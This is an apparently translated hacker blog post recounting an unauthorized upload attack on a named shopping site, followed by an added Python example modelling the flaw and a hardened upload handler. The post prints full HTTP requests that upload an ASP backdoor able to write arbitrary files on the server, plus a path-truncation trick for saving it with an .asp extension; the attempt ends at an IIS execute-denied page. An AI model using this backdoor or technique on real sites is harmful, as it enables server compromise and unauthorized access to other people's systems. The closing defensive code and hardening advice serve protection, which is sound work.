A small file upload test

Source: Internet
Author: User
Tags: servervariables, microsoft, iis
One evening, around dinner time, I took a short break for myself after a busy day. I went over to a few hacker sites I visit often to check on my articles; I still like Wuhan's 315 Security Net, which has plenty of material and is updated promptly.
I remembered seeing a Flash tutorial on 315 Security Net about assigning permissions on a server's hard disk. Having learned that this site was on a virtual host, I ran a program I had written against it to see whether there was anything usable, and found the upload page of a Dynamic Shopping Mall installation:
http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
I captured the packet of an upload attempt. The captured request is as follows:

POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3306
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="editname"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="formname"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.asp"
Content-Type: application/octet-stream

<% Dim objFSO %>
<% Dim fdata %>
<% Dim objCountFile %>
<% On Error Resume Next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% If Trim(Request("syfdpath")) <> "" Then %>
<% fdata = Request("cyfddata") %>
<% Set objCountFile = objFSO.CreateTextFile(Request("syfdpath"), True) %>
<% objCountFile.Write fdata %>
<% If Err = 0 Then %>
<% Response.Write "Save success!" %>
<% Else %>
<% Response.Write "Save unsuccess!" %>
<% End If %>
<% Err.Clear %>
<% End If %>
<% objCountFile.Close %>
<% Set objCountFile = Nothing %>
<% Set objFSO = Nothing %>
<%' The HTML tags of the form below were stripped when this page was extracted; the tags and the two field names are reconstructed from the Request("syfdpath") and Request("cyfddata") calls above. %>
<% Response.Write "<form method=""post"">" %>
<% Response.Write "Absolute path of the file to be saved (including file name, for example D:/web/sys.asp): " %>
<% Response.Write "<input type=""text"" name=""syfdpath"" size=""50"">" %>
<% Response.Write "<br>" %>
<% Response.Write "Absolute path of this file: " %>
<%= Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.Write "<br>" %>
<% Response.Write "Content of the trojan to write: " %>
<% Response.Write "<textarea name=""cyfddata"" cols=""80"" rows=""10""></textarea>" %>
<% Response.Write "<br>" %>
<% Response.Write "<input type=""submit"" value=""Save"">" %>
<% Response.Write "</form>" %>
Save-file workstation, beautified edition
---- Power by Perl

-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

Start upload
-----------------------------7d51863950254--

Submitting the packet as it is returns the following:
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2005 10:05:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 493
Content-Type: text/html
Cache-Control: private

ADODB.Stream error '800a0bbc'

Failed to Write File.

/upload_wj.inc, line 181

Since the returned data tells us that the root directory does not allow file writes, we change the upload path in the packet to bookpic/sys.asp and the Content-Length to 3314. The response is now:
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 10:07:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 472
Content-Type: text/html
Cache-Control: private

Heh, the file uploaded successfully, but don't get excited yet. You can see from the returned data that the saved file is bookpic/sys.asp20054181875495496.gif, and opening that file shows our backdoor's source. It took some effort to get it this far. Take a closer look at the file name bookpic/sys.asp20054181875495496.gif. What do you think? Any ideas? Haha......
Our .asp suffix is kept, but a long string and a .gif suffix have been appended, turning our ASP file into a GIF. Since I had not read this program's upload code, I went by experience: I modified the backdoor packet so that the part after the name gets cut off. The modified packet is as follows:
POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3316
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/wolf.asp
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="editname"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="formname"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.asp.gif"
Content-Type: application/octet-stream

(file body unchanged: the same save.asp script as in the first packet above)

-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

Start upload
-----------------------------7d51863950254--

Nothing else in the packet changes: you only need to change G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.gif in the first modified packet to G:/backdoor/Webpage Trojan/Haiyang ASP Trojan/2005/modified/save.asp.gif, and the rest stays the same. The upload window closed in a flash (because I used a batch file to submit it......). Although no result came back, I knew the data had been truncated at that point and the file had become a normal ASP file. Browsing to the backdoor, the browser displayed:

The page cannot be displayed
You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed.
--------------------------------------------------------------------------------

Please try the following:

If you believe this directory should allow execute access, please contact the Web site administrator.
HTTP Error 403.1 - Forbidden: Execute access is denied.
Internet Information Services (IIS)

Heh heh...... Seeing this page means it worked: the ASP file can be uploaded. Then I changed the directory and tried again: no file writes allowed! And this image directory does not allow our backdoor to execute.
After all, it is the host of a site that takes security seriously; with directory restrictions and permission settings done like this, anyone who still got hacked would have reason to be ashamed. That is the end of the whole test. I don't know what you think after reading it. Although I didn't get a shell, what I want to highlight is the idea in the article: what we usually need is to accumulate more experience and pay more attention to the application. Finding a small thing like this is not particularly difficult. (Don't throw eggs at me if you dislike the article; I'm afraid of eating them. If you like it, throw money instead; I'm poor ~~~)
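To make the flaw in the file naming concrete, here is an added example in Python. It is my code, not code from the post and not the shop's own upfile_flash.asp (whose source the author says he never read). It builds multipart bodies with the same field names as the captured packets, parses them back, and applies two naming schemes: the one the responses imply (client-supplied filepath plus digits plus ".gif") and a hardened one that ignores the client's path, allow-lists the extension, checks magic bytes and rejects control characters. The stamp digits, the "uploads" directory, the token and the image bytes are constructed; modelling the "cut off" as a NUL byte in filepath, and the ".gif" being hard-coded server-side, are my assumptions about a server nobody here can see.

```python
"""Model of the upload naming flaw described in the post, with a hardened version.

Added example: not code from the original post and not the shop's own
upfile_flash.asp.  Everything about the server side is inferred from the
responses quoted in the post; each inference is marked as an assumption.
"""
import re
from typing import Dict, Optional, Tuple

BOUNDARY = "---------------------------7d51863950254"   # boundary used in the captured packet
Field = Tuple[Optional[str], bytes]                      # (filename if a file part, raw value)

# Leading bytes a file of each permitted type must start with.
MAGIC = {"jpg": b"\xff\xd8\xff", "gif": b"GIF8", "png": b"\x89PNG\r\n\x1a\n"}


def build_body(filepath: str, filename: str, content: bytes, filelx: str = "jpg") -> bytes:
    """Construct a multipart/form-data body with the field names seen in the packet."""
    def part(name: str, value: bytes, extra: str = "") -> bytes:
        head = f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"{extra}\r\n'
        if extra:                       # the file part also carries a Content-Type line
            head += "Content-Type: application/octet-stream\r\n"
        return head.encode("latin-1") + b"\r\n" + value + b"\r\n"

    return (part("filepath", filepath.encode("latin-1"))
            + part("filelx", filelx.encode("latin-1"))
            + part("editname", b"bookpic")
            + part("formname", b"myform")
            + part("act", b"uploadfile")
            + part("file1", content, f'; filename="{filename}"')
            + part("Submit", b"Start upload")
            + f"--{BOUNDARY}--\r\n".encode("latin-1"))


def parse_form(body: bytes) -> Dict[str, Field]:
    """Minimal multipart/form-data splitter, enough for this example (not RFC-complete)."""
    fields: Dict[str, Field] = {}
    for chunk in body.split(b"--" + BOUNDARY.encode("latin-1"))[1:]:
        if chunk.startswith(b"--"):     # closing delimiter
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        head_text = head.decode("latin-1")
        name = re.search(r';\s*name="([^"]*)"', head_text).group(1)
        fname = re.search(r'filename="([^"]*)"', head_text)
        fields[name] = (fname.group(1) if fname else None, value[:-2])   # drop CRLF before next delimiter
    return fields


def vulnerable_save_name(fields: Dict[str, Field], stamp: str) -> str:
    """Naming scheme inferred from the post: client-controlled filepath + digits + '.gif'.

    The site appended '.gif' although filelx was jpg; where that came from is not
    visible, so it is hard-coded here (assumption).  Truncating at a NUL models the
    'cut off' the author describes; that the script's file API treated the path as
    NUL-terminated is my assumption, not something the post states.
    """
    filepath = fields["filepath"][1].decode("latin-1")
    return (filepath + stamp + ".gif").split("\x00", 1)[0]


def hardened_save_name(fields: Dict[str, Field], upload_root: str, token: str) -> str:
    """Server-chosen name: ignore the client's path, allow-list the extension, verify
    magic bytes, reject control characters.  upload_root must additionally have script
    execution disabled in IIS (the 403.1 at the end of the post is exactly that)."""
    filename, data = fields["file1"]
    if filename is None:
        raise ValueError("no file part")
    base = re.split(r"[\\/]", filename)[-1]              # strip any client-supplied directory
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in MAGIC:
        raise ValueError(f"extension {ext!r} not allowed")
    if not data.startswith(MAGIC[ext]):
        raise ValueError(f"content does not look like a .{ext} file")
    if re.search(r"[\x00-\x1f]", base) or any(c < 0x20 for c in fields["filepath"][1]):
        raise ValueError("control character in filename or filepath")
    return f"{upload_root}/{token}.{ext}"                # token: random, generated server-side


def demo() -> Dict[str, str]:
    """Run both schemes over constructed packets shaped like the ones in the post."""
    asp = b'<% Response.Write Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) %>'
    gif = b"GIF89a" + b"\x00" * 10                         # constructed, not a real image
    stamp = "20054181875495496"                            # digits the site appended
    out: Dict[str, str] = {}
    out["naive"] = vulnerable_save_name(parse_form(build_body("bookpic/sys.asp", "save.asp", asp)), stamp)
    out["truncated"] = vulnerable_save_name(parse_form(build_body("bookpic/wolf.asp\x00", "save.asp.gif", asp)), stamp)
    try:
        hardened_save_name(parse_form(build_body("bookpic/wolf.asp\x00", "save.asp.gif", asp)), "uploads", "a1b2c3")
        out["hardened_asp"] = "accepted"
    except ValueError as exc:
        out["hardened_asp"] = f"rejected: {exc}"
    out["hardened_gif"] = hardened_save_name(parse_form(build_body("bookpic/", "photo.gif", gif)), "uploads", "a1b2c3")
    return out


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key:13s} {val}")
```

Run as-is, the naive scheme reproduces the name the site returned for the second packet, and the hardened one rejects the ASP payload whatever it is called. Note what actually saved this host was not the naming at all: the 403.1 shows that the bookpic directory had execute permissions removed in IIS, so even a correctly named .asp there would never run. Disable script execution on every upload directory (or keep uploads outside the web root) in addition to fixing the naming.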
